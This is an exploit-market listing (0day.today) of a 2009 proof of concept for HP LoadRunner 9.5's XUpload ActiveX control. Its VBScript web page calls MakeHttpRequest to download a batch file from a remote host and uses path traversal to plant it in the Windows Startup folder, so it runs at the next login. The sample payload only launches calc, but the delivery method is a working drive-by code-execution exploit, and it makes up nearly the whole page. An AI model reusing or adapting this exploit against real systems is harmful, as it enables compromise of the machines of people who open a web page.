[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HP LoadRunner 9.5 remote file creation PoC

Author
Pyrokinesis
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9749
Category
dos / poc
Date add
29-09-2009
Platform
unsorted
==========================================
HP LoadRunner 9.5 remote file creation PoC
==========================================


# Title: HP LoadRunner 9.5 remote file creation PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pyrokinesis
# Published: 2009-09-29
# Verified: yes

view source
print?
<!--
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc
(IE 8)
by Nine:Situations:Group::pyrokinesis
 
CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}
Progid: Persits.XUpload.2
Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
expl.txt code:

cmd /c start calc
-->
<html>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />
</object>
<script language='vbscript'>
 
' http://host/expl.txt , a batch script that starts calc.exe
XUPLOADLib.Server = "host"
XUPLOADLib.Script = "expl.txt"
 
' place it in the Startup folder, italian path, change for your os
Method=""
Params=""
Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd"
UserAgent=""
Headers=""
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers
</script>



#  0day.today [2024-12-24]  #